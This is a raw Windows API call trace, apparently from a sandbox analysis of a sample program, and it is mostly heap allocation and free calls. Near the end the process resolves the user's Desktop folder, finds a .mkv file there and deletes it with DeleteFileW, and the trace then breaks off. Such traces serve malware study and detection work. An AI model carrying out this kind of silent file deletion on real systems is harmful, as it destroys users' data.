RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0189.861] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0189.861] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0189.861] CloseHandle (hObject=0x268) returned 1 [0189.861] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0189.861] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0189.862] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b7a48 | out: hHeap=0x25c0000) returned 1 [0189.863] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0189.863] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0189.863] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0189.863] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0189.863] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0189.863] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0189.863] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0189.863] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0189.863] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0189.863] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0189.863] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0189.863] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0189.863] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0189.864] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0189.864] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0189.864] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0189.864] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0189.864] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0189.864] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0189.864] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0189.864] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0189.864] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0189.864] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0189.864] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0189.864] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0189.864] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0189.864] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0189.864] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0189.864] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0189.864] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa878 [0189.864] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9570 [0189.864] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a96d8 [0189.864] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0189.865] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24ac978 [0189.865] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0189.865] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0189.865] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa9b0 [0189.865] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0189.865] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0189.865] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0189.865] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0189.865] CloseHandle (hObject=0x294) returned 1 [0189.995] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0189.995] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0189.995] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24c7a50 | out: hHeap=0x25c0000) returned 1 [0189.996] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0189.996] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0189.996] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0189.996] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0189.997] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0189.997] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0189.997] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0189.997] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0189.997] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0189.997] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0189.997] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0189.997] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0189.997] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0189.997] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0189.997] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0189.997] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0189.997] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0189.997] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0189.997] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0189.997] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0189.997] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0189.997] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0189.997] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0189.997] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0189.998] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0189.998] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0189.998] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0189.998] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0189.998] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0189.998] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0189.998] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0189.998] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0189.998] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0189.998] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0189.998] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0189.998] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0189.998] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0189.998] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0189.998] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0189.998] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0189.998] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b98 | out: hHeap=0x25c0000) returned 1 [0189.998] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0189.998] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b4870 | out: hHeap=0x25c0000) returned 1 [0189.998] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0189.998] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0189.998] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0189.999] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0189.999] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0189.999] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c90 | out: hHeap=0x25c0000) returned 1 [0189.999] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0189.999] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6ad0 | out: hHeap=0x25c0000) returned 1 [0189.999] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bf8 | out: hHeap=0x25c0000) returned 1 [0189.999] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0189.999] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0189.999] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0189.999] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0189.999] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c68 | out: hHeap=0x25c0000) returned 1 [0189.999] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0189.999] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0189.999] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b78 | out: hHeap=0x25c0000) returned 1 [0189.999] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0189.999] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0189.999] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0189.999] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cd8 | out: hHeap=0x25c0000) returned 1 [0189.999] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0189.999] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b20 | out: hHeap=0x25c0000) returned 1 [0189.999] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0190.000] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0190.000] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b48 | out: hHeap=0x25c0000) returned 1 [0190.000] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0190.000] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0190.000] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0190.000] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b69e0 | out: hHeap=0x25c0000) returned 1 [0190.000] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0190.000] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0190.000] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2048 | out: hHeap=0x25c0000) returned 1 [0190.001] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0190.002] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0190.002] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cb0 | out: hHeap=0x25c0000) returned 1 [0190.002] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0190.002] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0190.002] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b88 | out: hHeap=0x25c0000) returned 1 [0190.002] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a80 | out: hHeap=0x25c0000) returned 1 [0190.002] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0190.002] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ab0 | out: hHeap=0x25c0000) returned 1 [0190.002] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0190.002] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0190.002] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0190.002] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0190.002] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0190.002] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0190.002] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416f30 | out: hHeap=0x25c0000) returned 1 [0190.002] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0190.002] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0190.002] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0190.002] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0190.002] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0190.002] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0190.002] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0190.003] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0190.003] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0190.003] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0190.003] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0190.003] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0190.003] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0190.003] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0190.003] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0190.003] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0190.003] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0190.003] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0190.003] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0190.003] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0190.003] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x2416f30 [0190.003] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0190.003] CharUpperBuffW (in: lpsz="DesktopDir", cchLength=0xa | out: lpsz="DESKTOPDIR") returned 0xa [0190.003] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0190.003] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0190.003] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa920 [0190.003] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0190.004] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0190.004] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa8a8 [0190.004] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0190.004] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8bf440 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x0 [0190.004] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0190.004] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x50) returned 0x240a4d0 [0190.004] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0190.004] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0190.004] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416f30 | out: hHeap=0x25c0000) returned 1 [0190.004] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0190.004] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0190.004] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0190.004] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0190.004] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0190.004] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0190.004] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0190.004] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0190.004] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0190.004] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0190.004] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0190.004] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0190.005] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0190.005] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0190.005] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0190.005] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xf0) returned 0x2416f30 [0190.005] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x240a4d0 | out: hHeap=0x25c0000) returned 1 [0190.005] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0190.005] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0190.005] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0190.005] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0190.005] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x74) returned 0x24202f0 [0190.005] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop/UCS72GVnNBUxEzx.mkv", nBufferLength=0x104, lpBuffer=0x8bee20, lpFilePart=0x8bedfc | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\UCS72GVnNBUxEzx.mkv", lpFilePart=0x8bedfc*="UCS72GVnNBUxEzx.mkv") returned 0x39 [0190.005] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24202f0 | out: hHeap=0x25c0000) returned 1 [0190.005] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\UCS72GVnNBUxEzx.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ucs72gvnnbuxezx.mkv")) returned 0x20 [0190.005] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\UCS72GVnNBUxEzx.mkv", lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7aaf7f30, ftCreationTime.dwHighDateTime=0x1d4c5f8, ftLastAccessTime.dwLowDateTime=0x72f31300, ftLastAccessTime.dwHighDateTime=0x1d4d201, ftLastWriteTime.dwLowDateTime=0x72f31300, ftLastWriteTime.dwHighDateTime=0x1d4d201, nFileSizeHigh=0x0, nFileSizeLow=0x3c59, dwReserved0=0x81, dwReserved1=0x4, cFileName="UCS72GVnNBUxEzx.mkv", cAlternateFileName="UCS72G~1.MKV")) returned 0xaa58a0 [0190.005] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\UCS72GVnNBUxEzx.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ucs72gvnnbuxezx.mkv")) returned 1 [0190.007] FindNextFileW (in: hFindFile=0xaa58a0, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7aaf7f30, ftCreationTime.dwHighDateTime=0x1d4c5f8, ftLastAccessTime.dwLowDateTime=0x72f31300, ftLastAccessTime.dwHighDateTime=0x1d4d201, ftLastWriteTime.dwLowDateTime=0x72f31300, ftLastWriteTime.dwHighDateTime=0x1d4d201, nFileSizeHigh=0x0, nFileSizeLow=0x3c59, dwReserved0=0x81, dwReserved1=0x4, cFileName="UCS72GVnNBUxEzx.mkv", cAlternateFileName="UCS72G~1.MKV")) returned 0 [0190.007] FindClose (in: hFindFile=0xaa58a0 | out: hFindFile=0xaa58a0) returned 1 [0190.007] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416f30 | out: hHeap=0x25c0000) returned 1 [0190.007] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0190.007] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0190.007] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0190.007] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0190.007] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) 